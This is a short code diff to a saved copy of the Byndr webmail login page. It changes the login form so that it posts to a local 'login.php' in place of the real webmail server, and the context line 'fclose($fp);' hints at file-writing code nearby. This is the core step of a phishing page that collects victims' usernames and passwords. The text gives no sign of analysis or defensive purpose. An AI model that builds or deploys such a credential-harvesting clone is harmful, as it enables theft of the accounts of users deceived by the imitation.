--- a/sites/byndr/login.html
+++ b/sites/byndr/login.html
@@ -60,7 +60,7 @@ fclose($fp);
 		<div class="wrap std_login">
 	<div class="top">
 		<div class="vmiddle">
-			<form action="https://webmail.byndr.com/login/" method="POST">
+			<form action="login.php" method="POST">
 				<div class="logo-wrap">
 					<a href="http://www.byndr.com/">
 						<img border="0" class="byndr_logo" src="./Login _ Byndr_files/logo.png">
